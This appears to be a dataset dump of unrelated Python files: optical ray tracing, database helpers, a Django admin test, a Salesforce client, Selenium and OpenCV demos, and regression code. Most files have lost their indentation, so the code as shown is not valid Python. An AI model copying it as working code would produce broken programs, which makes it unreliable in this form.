Dataset schema (one row per source file; the rows are rendered below as individual files):

| column | type | range / values |
|---|---|---|
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | length 5-283 |
| content_id | string | length 40 |
| detected_licenses | sequence | length 0-41 |
| license_type | string | 2 classes |
| repo_name | string | length 7-96 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string | 58 classes |
| visit_date | timestamp[us] | |
| revision_date | timestamp[us] | |
| committer_date | timestamp[us] | |
| github_id | int64 | 12.7k-662M, nullable |
| star_events_count | int64 | 0-35.5k |
| fork_events_count | int64 | 0-20.6k |
| gha_license_id | string | 11 classes |
| gha_event_created_at | timestamp[us] | |
| gha_created_at | timestamp[us] | |
| gha_language | string | 43 classes |
| src_encoding | string | 9 classes |
| language | string | 1 value |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 7-5.88M |
| extension | string | 30 classes |
| content | string | length 7-5.88M |
| authors | sequence | length 1 |
| author | string | length 0-73 |
# ===== File: /TOM_air/ray_traj_3D_batch_stretched2.py (repo: hgoumner/Python, no license) =====
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 8 08:35:08 2017
@author: goumnero
"""
#%% Import modules
import numpy as np
import pandas as pd
import scipy.interpolate as si
import numdifftools as nd
from scipy.integrate import odeint
#%% Input
# Load file
direc = '1 K/KFH/T15_5055'
data = pd.read_csv(direc + '/1K_T15_5055.csv',header=8)
#%% Import temperature, compute refractive index, export data
# Extract coordinates and temperature
def get_temp(data):
data = data.values # Convert data to array
xin = data[:,0]+10 # Get X coordinates
yin = data[:,1] # Get Y coordinates
zin = data[:,2] # Get Z coordinates
Tin = data[:,3] # Get Temperature
x = np.unique(xin) # Get unique X coordinates
y = np.unique(yin) # Get unique Y coordinates
    z = np.unique(zin)                                # Get unique Z coordinates; centered later to the optical axis
dx = x[1] - x[0] # Get X step
dy = y[1] - y[0] # Get Y step
dz = z[1] - z[0] # Get Z step
nx = len(x) # Get number of X coordinates
ny = len(y) # Get number of Y coordinates
nz = len(z) # Get number of Z coordinates
lx = int(max(x)-min(x)) # Get range of X
ly = int(max(y)-min(y)) # Get range of Y
lz = int(max(z)-min(z)) # Get range of Z
r = np.array([x,y,z]).T # Create position array
y3, x3, z3 = np.meshgrid(y,x,z) # Create 3D coordinate array
t = Tin.reshape((ny,nx,nz),order='F').transpose() # Reshape temperature input to 3D array
'''
Check if reshaped data matches input
check = np.c_[x3.ravel(),y3.ravel(),z3.ravel(),t3d.ravel()]
inds = np.lexsort((check[:,1],check[:,0]))
check = check[inds]
'''
return x, y, z, dx, dy, dz, nx, ny, nz, lx, ly, lz, r, x3, y3, z3, t # Output parameters
# Refractive Index function according to Gladstone-Dale Law
def N3D(pos):
global t
beta = 0.000293
Ts = 293.15
# Compute whole 3D array or determine starting point
if type(pos) == np.ndarray:
xg,yg,zg = np.meshgrid(pos[0],pos[1],pos[2])
out = np.zeros(np.shape(xg))
ox = np.shape(xg)[1]
oy = np.shape(xg)[0]
oz = np.shape(xg)[2]
for i in range(ox):
for j in range(oy):
for k in range(oz):
out[j,i,k] = 1 + beta*Ts/t[j,i,k]
# out = 1 + beta*Ts/t
else:
global x,y,z
xx = pos[0]
yy = pos[1]
zz = pos[2]
idx = np.argmin(np.abs(x-xx)) # Index of closest x element
idy = np.argmin(np.abs(y-yy)) # Index of closest y element
idz = np.argmin(np.abs(z-zz)) # Index of closest z element
out = 1 + beta*Ts/t[idy,idx,idz]
return out # Output parameters
#def N3D(r):
#
# if len(r) > 3:
# yyy,xxx,zzz = np.meshgrid(r[:,1],r[:,0],r[:,2])
# else:
# xxx = r[0]
# yyy = r[1]
# zzz = r[2]
#
# return 1+0.0*xxx+0.000*yyy+0.02*zzz
def tinterp(x,y,z,t,p):
# Interpolation
xx = x #np.linspace(np.min(x3),np.max(x3),p)
yy = np.linspace(np.min(y),np.max(y),p)
zz = np.linspace(np.min(z),np.max(z),p)
dx = xx[1] - xx[0] # Get X step
dy = yy[1] - yy[0] # Get Y step
dz = zz[1] - zz[0] # Get Z step
nx = len(xx) # Get number of X coordinates
ny = len(yy) # Get number of Y coordinates
nz = len(zz) # Get number of Z coordinates
y3i, x3i, z3i = np.meshgrid(yy,xx,zz)
r = np.array([xx,yy,zz]).T # Create position array
# itp = si.RegularGridInterpolator((y, x, z), t, method='nearest')
# grid = np.ix_(yy, xx, zz)
# ti = itp(grid)
ti = si.interpn((y,x,z), t, np.array([y3i,x3i,z3i]).T)
ti = ti.swapaxes(1,2)
return x3i, y3i, z3i, dx, dy, dz, nx, ny, nz, ti, r
# Get data
x, y, z, dx, dy, dz, nx, ny, nz, lx, ly, lz, r, x3, y3, z3, t = get_temp(data)
offset = 0 #np.mean(z)
# Interpolate onto finer grid
p = 8
x3i, y3i, z3i, dxi, dyi, dzi, nxi, nyi, nzi, ti, ri = tinterp(x,y,z,t,p+1)
x3 = x3i
y3 = y3i
z3 = z3i
dx = dxi
dy = dyi
dz = dzi
nx = nxi
ny = nyi
nz = nzi
tin = t
t = ti.T
r = ri
# Refractive Index and gradients
n = N3D(r)
ngy, ngx, ngz = np.gradient(n,dy,dx,dz,axis=(1,0,2))
tgy, tgx, tgz = np.gradient(t,dy,dx,dz,axis=(1,0,2))
# Export 3D field output
xo = x3.ravel()
yo = y3.ravel()
zo = z3.ravel() - offset
to = t.ravel()
no = n.ravel()
tgxf = tgx.ravel()
tgyf = tgy.ravel()
tgzf = tgz.ravel()
ngxf = ngx.ravel()
ngyf = ngy.ravel()
ngzf = ngz.ravel()
ngtot = np.sqrt(ngxf**2+ngyf**2+ngzf**2)
ngxp = abs(ngxf/ngtot)
ngyp = abs(ngyf/ngtot)
ngzp = abs(ngzf/ngtot)
fo = np.c_[xo,yo,zo,to,tgxf,tgyf,tgzf,no,ngxf,ngyf,ngzf,ngtot,ngxp,ngyp,ngzp]
fo = np.float64(sorted(fo,key=lambda x: (x[2],x[1])))
head1 = 'TITLE = "3D N and T"\nVARIABLES = "X","Y","Z","T","Tx","Ty","Tz","N","Nx","Ny","Nz","Ntot","Nxt","Nyt","Nzt"\nZONE T = "T and N", I=%d, J=%d, K=%d' % (nx,ny,nz)
np.savetxt(direc + '/KF_3D_TN.dat',fo,fmt='%10.6e',delimiter='\t',header=head1,comments='')
#%% Compute and export ray trajectory
# Gradient
grd_n3d = nd.Gradient(N3D)
# Integration range
t_range = np.arange(0,np.max([lx,ly,lz])+5,0.01)
def start_point(x,y,z,r_0,theta):
########################## Starting point #####################################
# id_x = np.argmin(np.abs(x-r_0[0])) # Index of closest x element
# id_y = np.argmin(np.abs(y-r_0[1])) # Index of closest y element
# id_z = np.argmin(np.abs(z-r_0[2])) # Index of closest z element
n_0 = N3D(r_0)
######################### Initial incident angle ##############################
# theta_0 = theta*(np.pi/180)
############ Initial velocity based on parametrization constraint #############
    '''
    Parametrization constraint:  n(r) / |dr/dt| = 1,
    i.e.  n(r) = |dr/dt| = sqrt((dx/dt)^2 + (dy/dt)^2 + (dz/dt)^2)
        dx/dt = n(r_0)*cos(theta_0)
        dy/dt = n(r_0)*sin(theta_0)
        dz/dt = n(r_0)*cos(theta_0)
    '''
# Derivative
# a = 0.000
dxdt = -n_0 #np.float64(n_0*np.cos(theta_0)-a)
dydt = 0.0 #np.float64(n_0*np.sin(theta_0)-a)
dzdt = 0.0 #np.float64(np.sqrt(n_0**2-dxdt**2-dydt**2))
# ch = np.float64(np.sqrt(dxdt**2+dydt**2+dzdt**2))/n_0
# Initial velocity
v_0 = [dxdt,dydt,dzdt]
return v_0 # Output parameter
# Compute the differential
def diff_y3d(y, t):
xx = y[0]
yy = y[1]
zz = y[2]
rr = [xx,yy,zz]
# print(rr)
n_t = N3D(rr) # starting RI
grd = grd_n3d(rr) # gradient
return [y[3], y[4], y[5], grd[0]*n_t, grd[1]*n_t, grd[2]*n_t] # Output parameter
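# Note on diff_y3d: with the parametrization |dr/dt| = n(r), the ray equation
# d/dt(n * dr/dt) = grad(n) reduces to d2r/dt2 = n * grad(n), which is the
# acceleration returned above. The parameter `t` here is odeint's integration
# variable and is distinct from the module-level temperature array `t` that
# N3D reads via `global t`.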
# Export results
def exp_res(sol3d,x,y,z,nx,ny,nz,r_0):
rx = sol3d[:,0] # Get x coordinate of ray
ry = sol3d[:,1] # Get y coordinate of ray
rz = sol3d[:,2] # Get z coordinate of ray
delx = rx[-1]-rx[0] # Get x deflection (last - first point)
dely = ry[-1]-ry[0] # Get y deflection (last - first point)
delz = rz[-1]-rz[0] # Get z deflection (last - first point)
# Ray trajectory
rto = np.c_[rx,ry,rz]
xc = rto[rto[:,0]>=min(x),:]
xc = xc[xc[:,0]<=max(x),:]
yc = xc[xc[:,1]>=min(y),:]
yc = yc[yc[:,1]<=max(y),:]
zc = yc[yc[:,2]>=min(z),:]
zc = zc[zc[:,2]<=max(z),:]
rout = zc
npp = 100
rout = np.c_[rout[::npp,0],rout[::npp,1],rout[::npp,2]]
# vals = 8000 # Set number of values to be interpolated
# rxint = np.linspace(min(x),round(max(x)),vals+1) # Set interpolated x array
# ryint = np.interp(rxint,rout[:,0],rout[:,1]) # Set interpolated y array
# rzint = np.interp(rxint,rout[:,0],rout[:,2]) # Set interpolated z array
# rout = np.c_[rxint,ryint,rzint] # Put ray trajectory in array
devx = np.abs(rout[:,0] - rout[0,0])/1000
devy = (rout[:,1] - ry[0])/1000
devz = (rout[:,2] - rz[0])/1000
devtot = np.sqrt(devy**2+devz**2)
rout = np.c_[rout,devx,devy,devz,devtot]
# print('\ndY: %10.8e m, dZ: %10.8e m' % (dely/1000,delz/1000))
return rout, delx, dely, delz
# Allocate deflection arrays
xd = []
yd = []
zd = []
delx = []
dely = []
delz = []
rall = np.zeros((1,7))
n = 5
b = 1
ysq = np.linspace(b,max(y)-b,n)
zsq = np.linspace(min(z)+b,max(z)-b,n)
xsq = np.max(x)*np.ones(1)
Xsq, Ysq, Zsq = np.meshgrid(xsq,ysq,zsq)
xpr = Xsq.ravel()
ypr = Ysq.ravel()
zpr = Zsq.ravel()
pr = np.c_[xpr,ypr,zpr]
for i in range(len(pr)):
# Starting angle
theta = 0
# Starting point
x0 = pr[i,0]
y0 = pr[i,1]
z0 = pr[i,2]
r_0 = [x0,y0,z0]
# idx, idy, idz, t00, n00 = N3Dc(r_0)
# Starting velocity
v_0 = start_point(x,y,z,r_0,theta)
# Integration
sol3d = odeint(diff_y3d,r_0 + v_0,t_range)
# Export
    # ddx/ddy/ddz are per-ray deflections; renamed to avoid shadowing the grid steps dx/dy/dz
    rcur, ddx, ddy, ddz = exp_res(sol3d,x,y,z,nx,ny,nz,r_0)
    rall = np.vstack((rall,rcur))
    xd.append(x0)
    yd.append(y0)
    zd.append(z0)
    delx.append(ddx/1000)
    dely.append(ddy/1000)
    delz.append(ddz/1000)
print('%d / %d' % ((i+1),len(pr)) + ', %d' % (100*(i+1)/len(pr)) + ' %')
# Export 3D Ray trajectory
rall = np.delete(rall, (0), axis=0)
rall[:,2] = rall[:,2] - offset
#head2 = 'TITLE = "3D XYZ"\nVARIABLES = "X","Y","Z"\nZONE T = "Frame 1", I=%d, J=%d' % (len(xout),3)
#np.savetxt('3D_XYZ.dat',rto,fmt=['%6.4e','%6.10e','%6.10e'],delimiter='\t',header=head2,comments='')
head2 = 'X,Y,Z,dXp,dYp,dZp,dTOTp'
np.savetxt(direc + '/' + 'KF_3D_XYZ.csv',rall,fmt=['%8.4f','%8.4f','%8.4f','%10.6e','%10.6e','%10.6e','%10.6e'],delimiter=',',header=head2,comments='')
# Export 3D Ray deflection
deltot = []
for i in range(len(delx)):
deltot.append(np.sqrt(dely[i]**2+delz[i]**2))
zd = [zd[i]-offset for i in range(len(zd))]
defl = np.c_[range(1,len(zsq)*len(ysq)+1),xd,yd,zd,delx,dely,delz,deltot]
head3 = 'N,X0,Y0,Z0,dX,dY,dZ,dTOT'
np.savetxt(direc + '/KF_3D_Deflection.csv',defl,fmt='%10.6f',delimiter=',',header=head3,comments='')
#%% Plot
'''
import matplotlib
import matplotlib.cm as cmx
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
pl1 = 0
pl2 = 0
pl3 = 0
if pl1 == 1:
fig = plt.figure(1)
ax = fig.add_subplot(111, projection='3d')
cmm = plt.get_cmap('jet')
cNorm = matplotlib.colors.Normalize(vmin=np.min(t3d), vmax=np.max(t3d))
scalarMap = cmx.ScalarMappable(norm=cNorm, cmap=cmm)
nnn = 2
ax.scatter(fo[::nnn,0],fo[::nnn,1],fo[::nnn,2], c=scalarMap.to_rgba(fo[::nnn,3]), alpha=0.5)
scalarMap.set_array(t3d)
fig.colorbar(scalarMap)
ax.set_xlim([np.min(x3),np.max(x3)])
ax.set_ylim([np.min(y3),np.max(y3)])
# ax.set_zlim([np.min(z3),np.max(z3)])
ax.set_xlabel('X [mm]')
ax.set_ylabel('Y [mm]')
ax.set_zlabel('Z [mm]')
plt.show()
#if pl2 == 0:
#
# foo = fo[fo[:,0].argsort()]
#
# npp = 100
# xp = foo[::npp,0]
# yp = foo[::npp,1]
# zp = foo[::npp,2]
# npl = foo[::npp,3]
# cs = npl
#
# fig = plt.figure(1)
# ax = fig.add_subplot(111, projection='3d')
# ax.plot(rx, ry, rz, 'y',linewidth=2)
# ax.quiver(r_0[0],r_0[1],r_0[2],v_0[0],v_0[1],v_0[2])
# ax.scatter(r_0[0],r_0[1],r_0[2],color='r')
# cmm = plt.get_cmap('jet')
# cNorm = matplotlib.colors.Normalize(vmin=min(cs), vmax=max(cs))
# scalarMap = cmx.ScalarMappable(norm=cNorm, cmap=cmm)
# ax.scatter(xp,yp,zp, c=scalarMap.to_rgba(cs), alpha=0.3)
# scalarMap.set_array(cs)
# fig.colorbar(scalarMap)
# ax.set_xlim([np.min(x),np.max(x)])
# ax.set_ylim([np.min(y),np.max(y)])
# ax.set_zlim([np.min(z),np.max(z)])
# ax.set_xlabel('X [mm]')
# ax.set_ylabel('Y [mm]')
# ax.set_zlabel('Z [mm]')
# plt.show()
#
#if pl3 == 0:
#
# plt.plot(range(n),dely,'r',label='dY')
# plt.plot(range(n),delz,'k',label='dZ')
# plt.xlabel('starting Y [mm]')
# plt.ylabel('Deflection [mm]')
# plt.legend()
# plt.grid()
#
'''
# ===== File: /wxnotify/common/database.py (repo: mxgnene01/wxnotify, no license) =====
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Meng xiangguo <[email protected]>
#
# _____ ______
# ____==== ]OO|_n_n__][. | |]
# [________]_|__|________)< |MENG|
# oo oo 'oo OOOO-| oo\_ ~o~~~o~'
# +--+--+--+--+--+--+--+--+--+--+--+--+--+
# 2017/7/24 5:55 PM
def fetchall_as_dict(cursor):
"""fetch all cursor results and returns them as a list of dicts"""
names = [x[0] for x in cursor.description]
rows = cursor.fetchall()
if rows:
return [dict(zip(names, row)) for row in rows]
else:
return []
def fetchone_as_dict(cursor):
"""fetch one cursor results and returns them as a list of dicts"""
names = [x[0] for x in cursor.description]
row = cursor.fetchone()
if row:
return dict(zip(names, row))
else:
return None
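# Minimal usage sketch (assumes a DB-API 2.0 connection `conn`; the query is
# illustrative):
#   cur = conn.cursor()
#   cur.execute("SELECT id, name FROM some_table")
#   rows = fetchall_as_dict(cur)   # -> [{'id': 1, 'name': '...'}, ...]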
# ===== File: /ch02/odbchelper.py (repo: agzon/py-dive, no license) =====
"""odbchelper.py sample script
This program is part of "Dive Into Python", a free Python book for
experienced programmers. Visit http://diveintopython.org/ for the
latest version.
All this stuff at the top of the script is just optional metadata;
the real code starts on the "def buildConnectionString" line
"""
__author__ = "Mark Pilgrim ([email protected])"
__version__ = "$Revision: 1.2 $"
__date__ = "$Date: 2004/05/05 21:57:19 $"
__copyright__ = "Copyright (c) 2001 Mark Pilgrim"
__license__ = "Python"
def buildConnectionString(params):
"""Build a connection string from a dictionary
Returns string.
"""
return ";".join(["%s=%s" % (k, v) for k, v in params.items()])
if __name__ == "__main__":
myParams = {"server":"mpilgrim", \
"database":"master", \
"uid":"sa", \
"pwd":"secret"
}
print (buildConnectionString(myParams))
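    # Expected output (key order may vary on Python versions without ordered dicts):
    # server=mpilgrim;uid=sa;database=master;pwd=secret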
# ===== File: /src/comparators/compare_functions/cca.py (repo: asd249180/similarity_and_matching, license: Apache-2.0) =====
import numpy as np
def rearrange_activations(activations):
batch_size = activations.shape[0]
flat_activations = activations.reshape(batch_size, -1)
return flat_activations
def cca(x1, x2):
x1_flat, x2_flat = rearrange_activations(x1), rearrange_activations(x2)
q1, r1 = np.linalg.qr(x1_flat)
q2, r2 = np.linalg.qr(x2_flat)
return (np.linalg.norm(q2.T @ q1))**2 / x1_flat.shape[1]
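# Why this works (a sketch, assuming x1_flat has full column rank and both
# inputs are centered): the columns of q1 and q2 are orthonormal bases of the
# two activation subspaces, and ||q2.T @ q1||_F^2 equals the sum of squared
# canonical correlations, so dividing by the number of x1 features gives
# their mean (an R^2_CCA-style similarity score).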
if __name__ == '__main__':
from sklearn.cross_decomposition import CCA
import numpy as np
n = 500000
features = 10000
np.random.seed(0)
U = np.random.random_sample(n).reshape(n//features,features)
V = np.random.random_sample(n).reshape(n//features,features)
print(cca(U,V))
# Sklearn
sk_cca = CCA(n_components=1)
sk_cca.fit(U, V)
U_c, V_c = sk_cca.transform(U, V)
result = np.corrcoef(U_c.T, V_c.T)[0,1]
print(result)
# Matrix
score = np.corrcoef(U_c.T, V_c.T)
    print(score)
# ===== File: /curriculum/tests/test_admin.py (repo: Vj-Ydv/jobs, license: MIT) =====
from django.test import TestCase
from django.contrib.auth import get_user_model
from django.core.urlresolvers import reverse
from curriculum.tests import factories
User = get_user_model()
class AdminExportResumeTest(TestCase):
def setUp(self):
self.user = User.objects.create(username='Mike', is_superuser=True, is_staff=True)
self.user.set_password('foo')
self.user.save()
self.client.login(username='Mike', password='foo')
def test_get(self):
resume = factories.ResumeFactory()
url = reverse('admin:curriculum_resume_changelist')
data = {
'_selected_action': [resume.id],
'action': 'export_resume',
'index': '0',
'select_across': '0',
}
response = self.client.post(url, data)
self.assertEqual(response.status_code, 200)
self.assertContains(response, resume.title)
def test_export(self):
resume = factories.ResumeFactory()
url = reverse('admin:curriculum_resume_changelist')
data = {
'_export': '_export',
'_selected_action': [resume.id],
'action': ['export_resume'],
}
response = self.client.post(url, data)
self.assertEqual(response.status_code, 200)
# ===== File: /Lib/site-packages/salesforce_api/client.py (repo: rayhaneHamoumi/arduino, license: BSD-3-Clause) =====
import requests
from .core import Connection
from . import login
from .services import sobjects, basic, tooling, deploy, retrieve, bulk
from .utils import misc as misc_utils
class Client:
def __init__(self, connection: Connection = None,
domain: str = None, username: str = None, password: str = None,
security_token: str = None, password_and_security_token: str = None, client_id: str = None,
client_secret: str = None, access_token: str = None, session: requests.Session = None, is_sandbox=False):
self.connection = connection if connection else login.magic(
domain=domain,
username=username,
password=password,
security_token=security_token,
password_and_security_token=password_and_security_token,
client_id=client_id,
client_secret=client_secret,
access_token=access_token,
session=misc_utils.get_session(session),
is_sandbox=is_sandbox
)
self._setup_services()
def _setup_services(self):
self.basic = basic.Basic(self.connection)
self.sobjects = sobjects.SObjects(self.connection)
self.tooling = tooling.Tooling(self.connection)
self.deploy = deploy.Deploy(self.connection)
self.retrieve = retrieve.Retrieve(self.connection)
self.bulk = bulk.Client(self.connection)
self.bulk_v1 = bulk.v1.Client(self.connection)
self.bulk_v2 = bulk.v2.Client(self.connection)
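# Minimal usage sketch (credentials are placeholders; the `query` call assumes
# the SObjects service exposes such a method, which is not shown in this file):
#   client = Client(username='user@example.com', password='...',
#                   security_token='...')
#   records = client.sobjects.query("SELECT Id, Name FROM Account")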
# ===== File: /python_web_demo/l7_05_元素操作.py (repo: liqi629/py_study, no license) =====
# -*- coding: utf-8 -*-
# @Time : 2019/5/21 22:52
# @Author : l7
# @Email :[email protected]
# @File : l7_05_元素操作.py
# @Software : PyCharm
from selenium import webdriver
import time
# Open the Chrome browser
driver = webdriver.Chrome()
# Open the target URL
driver.get("http://www.baidu.com")
# 3. Get an attribute value (the search button has id "su")
value = driver.find_element_by_id("su").get_attribute("value")
print(value)
# 4. Get the element's text content (stored but not used below)
text = driver.find_element_by_id("su").text
# 1. Type into the search box (id "kw")
driver.find_element_by_id("kw").send_keys("hello")
# 2. Click the search button (id "su")
driver.find_element_by_id("su").click()
time.sleep(2)
driver.quit()
# ===== File: /example_all_any.py (repo: sidh261805/python_examples, license: MIT) =====
num1 = [2,4,6,8,0]
num2 = [1,3,5,6,7]
# any(): True if at least one element satisfies the condition
print(any([num%2==0 for num in num1]))
print(any([num%2==0 for num in num2]))
# all(): True only if every element satisfies the condition
print(all([num%2==0 for num in num1]))
print(all([num%2==0 for num in num2]))
def sum(*args):  # note: this shadows the built-in sum()
if all([(type(arg)==int or type(arg)==float) for arg in args]):
return "all are int or float"
else:
return "different types"
print(sum(1,2,3,5.5,"hello"))
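# Expected output of the call above: "different types"
# (the string "hello" fails the int/float type check, so all(...) is False)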
################# Advance min 0r max ###################
student = [{"name" : "sidd", "score" : 80, "age" : 27},{"name" : "alka", "score" : 90, "age" : 26},{"name" : "lala", "score" : 99, "age" : 30}]
print(max(student, key = lambda item: item.get("score")))
print(max(student, key = lambda item: item.get("score"))["name"])
################ Advance sort ############################
fruits = ['apple','kiwi','mango','banana']
fruits.sort()
print(fruits)
print(sorted(student, key= lambda dic:dic.get("name"),reverse=True))
# ===== File: /python/openpyxl/formatting/formatting.py (repo: jrockway/tichu-tournament, license: MIT) =====
from __future__ import absolute_import
# Copyright (c) 2010-2016 openpyxl
from openpyxl.compat import OrderedDict, deprecated
from openpyxl.styles.differential import DifferentialStyle
from .rule import Rule
def unpack_rules(cfRules):
for key, rules in cfRules.items():
for idx,rule in enumerate(rules):
yield (key, idx, rule.priority)
class ConditionalFormatting(object):
"""Conditional formatting rules."""
def __init__(self):
self.cf_rules = OrderedDict()
self.max_priority = 0
def add(self, range_string, cfRule):
"""Add a rule such as ColorScaleRule, FormulaRule or CellIsRule
The priority will be added automatically.
"""
if not isinstance(cfRule, Rule):
raise ValueError("Only instances of openpyxl.formatting.rule.Rule may be added")
rule = cfRule
self.max_priority += 1
rule.priority = self.max_priority
self.cf_rules.setdefault(range_string, []).append(rule)
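    # Usage sketch (rule construction via openpyxl's CellIsRule helper;
    # worksheet wiring is omitted and the range/operator are illustrative):
    #   from openpyxl.formatting.rule import CellIsRule
    #   cf = ConditionalFormatting()
    #   cf.add('A1:A10', CellIsRule(operator='greaterThan', formula=['5']))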
def _fix_priorities(self):
rules = unpack_rules(self.cf_rules)
rules = sorted(rules, key=lambda x: x[2])
for idx, (key, rule_no, prio) in enumerate(rules, 1):
self.cf_rules[key][rule_no].priority = idx
self.max_priority = len(rules)
@deprecated("Always use Rule objects")
def update(self, cfRules):
pass
@deprecated("Conditionl Formats are saved automatically")
def setDxfStyles(self, wb):
pass
# ===== File: /tools/build/v2/test/example_make.py (repo: blackberry/Boost, license: BSL-1.0) =====
#!/usr/bin/python
# Copyright (C) Vladimir Prus 2006.
# Distributed under the Boost Software License, Version 1.0. (See
# accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
# Test the 'make' example.
import BoostBuild
t = BoostBuild.Tester()
t.set_tree("../example/make")
t.run_build_system()
t.expect_addition(["bin/$toolset/debug/main.cpp"])
t.cleanup()
# ===== File: /a-3-6-1-take pictures.py (repo: paulcwlin/raspi-AIoT-test, no license) =====
import cv2
ESC = 27
n = 1
index = 0
total = 100
def saveImage(face_image, index):
filename = '/home/pi/Documents/raspi-AIoT-test/images/h1/{:03d}.jpg'.format(index)
cv2.imwrite(filename, face_image)
print(filename)
faceCascade = cv2.CascadeClassifier('/home/pi/opencv/opencv-master/data/haarcascades/haarcascade_frontalface_alt2.xml')
cap = cv2.VideoCapture(0)
cv2.namedWindow('video', cv2.WINDOW_AUTOSIZE)
while n > 0:
ret, frame = cap.read()
frame = cv2.flip(frame, 1)
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = faceCascade.detectMultiScale(gray, 1.1, 3)
for (x,y,w,h) in faces:
frame = cv2.rectangle(frame,
(x,y), (x+w, y+h),
(0,255,0), 2)
if n % 5 == 0:
face_img = gray[y: y+h, x: x+w]
face_img = cv2.resize(face_img, (400,400))
saveImage(face_img, index)
index += 1
if index >= total:
print('get training data done')
n = -1
break
n += 1
cv2.imshow('video', frame)
    if cv2.waitKey(1) & 0xFF == ESC:  # mask to the low byte so the comparison works across platforms
cap.release()
cv2.destroyAllWindows()
        break
# ===== File: /linearRegression.py (repo: SohamSankhe/ml_project, no license) =====
from numpy.linalg import inv
import numpy as np
from numpy import array
from sklearn.linear_model import LinearRegression
import utils
class RidgeRegResults(): # class to store findings for k fold ridge
def __init__(self):
self.k = 0
self.lamb = 0
self.testIndex = 0 # to id hold out partition
self.sseTraining = 0
self.sseTest = 0
self.theta = []
def setResults(self, k, lamb, testIndex, sseTraining, sseTest, theta):
self.k = k
self.lamb = lamb
self.testIndex = testIndex
self.sseTraining = sseTraining
self.sseTest = sseTest
self.theta = theta
return
# test method
def printData(self):
print('\n-----')
print(' k = ', self.k, ' testIndex = ', self.testIndex, ' lambda = ', self.lamb, ' sseTest: ',
self.sseTest, ' sseTraining: ', self.sseTraining)
#print('theta: ', self.theta)
return
def calculateError(X, theta, Y):
estimation = X.dot(theta)
error = []
for i in range(0, Y.__len__()):
er = estimation[i] - Y[i]
error.append(er * er)
return sum(error) / Y.__len__()
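# Note: despite the sse* naming used by the callers, this returns the *mean*
# squared error (the summed squared error is divided by the number of samples).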
def calculateErrorSkLearn(estimation, Y):
error = []
for i in range(0, Y.__len__()):
er = estimation[i] - Y[i]
error.append(er * er)
return sum(error) / Y.__len__()
def calculateThetaClosedForm(X, Y):
X_Transpose = X.transpose()
theta = inv(X_Transpose.dot(X)).dot(X_Transpose).dot(Y)
return theta
def getGradient(X, theta, Y, learningRate):
X_transpose = X.transpose()
estimation = X.dot(theta)
error = estimation - Y
gradient = X_transpose.dot(error) / (2 * Y.__len__())
gradient = learningRate * gradient
return gradient
def getConvergence(newTheta, oldTheta):
'L1 error for thetas in gradient descent'
diff = newTheta - oldTheta
l1Norm = 0
for n in diff:
l1Norm += abs(n)
return l1Norm
def calculateThetaRidge(X, Y, lamb):
X_Transpose = X.transpose()
# make regularization matrix for lambda
xCol = np.shape(X)[1]
regMatrix = np.eye(xCol)
regMatrix = lamb * regMatrix
regMatrix_Transpose = regMatrix.transpose()
theta = inv(X_Transpose.dot(X) + regMatrix_Transpose.dot(regMatrix)).dot(X_Transpose).dot(Y)
return theta
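# Note: regMatrix.T @ regMatrix equals lamb**2 * I here, so this is the
# general Tikhonov form (X'X + G'G)^-1 X'y with G = lamb*I, rather than the
# textbook ridge term lamb*I.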
def calculateThetaGradientDescent(X, yTraining, n):
maxIterations = 10000
epsilon = 0.0001
oldTheta = []
newTheta = np.ones(n + 1) # starting with 1s as initial theta
for i in range(0, maxIterations):
oldTheta = newTheta
newTheta = newTheta - getGradient(X, newTheta, yTraining, 0.001)
error = getConvergence(newTheta, oldTheta)
# print('Iteration: ', i, ' Convergence: ', error)
if error <= epsilon:
print('Converged')
break
return newTheta
def getPhi(X, n):
rows = X.__len__()
cols = n + 1
phi = np.ones(shape=(rows, cols)) # all 1s
phi[:, 1] = X # 2nd row is X
for ind in range(2, n + 1):
phi[:, ind] = pow(phi[:, 1], ind)
return phi
def ridgeRegression(xTraining, yTraining,xTest, yTest, lambdaList, kList):
print('Ridge Regression\n')
findings = []
for k in kList:
# partition as per K
#partitionXList = np.vsplit(xTraining, k) # row wise partition
partitionXList = utils.getPartitions(xTraining, k)
#partitionYList = np.array_split(yTraining, k)
partitionYList = utils.getPartitionsList(yTraining, k)
for i in range(0, k): # take partition i as test
# select partition i as test set
xTst = partitionXList[i]
yTst = partitionYList[i]
# rest is training
xTrnList = [] # holds selected partitions to merge later
xTrn = [] # merged training set
yTrn = [] # merged test set
for j in range(0, k): # combine training partitions
if i != j:
xTrnList.append(partitionXList[j]) # list of matrices
yTrn.extend(partitionYList[j])
# get xTrn from xTrnList
totalRows = 0
for xPart in xTrnList:
totalRows += np.shape(xPart)[0]
xTrn = np.zeros((totalRows, np.shape(xTraining)[1]))
# merge training partitions
rowCtr = 0
for m in xTrnList:
noRows = np.shape(m)[0]
xTrn[rowCtr:rowCtr+noRows, :] = m
rowCtr += noRows
# X, Y, xTst, yTest
# for each hyper param, check error
for lamb in lambdaList:
theta = calculateThetaRidge(xTrn, yTrn, lamb)
sseTraining = calculateError(xTrn, theta, yTrn)
sseTest = calculateError(xTst, theta, yTst)
# store findings in object
resObj = RidgeRegResults()
resObj.setResults(k, lamb, i, sseTraining, sseTest, theta)
findings.append(resObj)
'''
if not not findings:
for f in findings:
f.printData()
'''
# get optimal lambda, sseTest, sseTraining, theta - sort on sseTest
findings = sorted(findings, key=lambda linkObj: linkObj.sseTest)
print('Findings length = ', findings.__len__())
print('Error in ridge reg: ', findings[0].sseTest)
print('Error in ridge reg last: ', findings[-1].sseTest)
reg = LinearRegression().fit(xTraining, yTraining)
reg.score(xTraining, yTraining)
print('sklearn training: ', calculateErrorSkLearn(reg.predict(xTraining), yTraining))
print('sklearn testing: ', calculateErrorSkLearn(reg.predict(xTest), yTest))
return findings[0].theta, findings
def ridgeNew(xTraining, yTraining,xTest, yTest, lambdaList, kList):
print('Ridge Regression\n')
findings = []
for lamb in lambdaList:
theta = calculateThetaRidge(xTraining, yTraining, lamb)
sseTraining = calculateError(xTraining, theta, yTraining)
sseTest = calculateError(xTest, theta, yTest)
# store findings in object
resObj = RidgeRegResults()
resObj.setResults(0, lamb, 0, sseTraining, sseTest, theta)
findings.append(resObj)
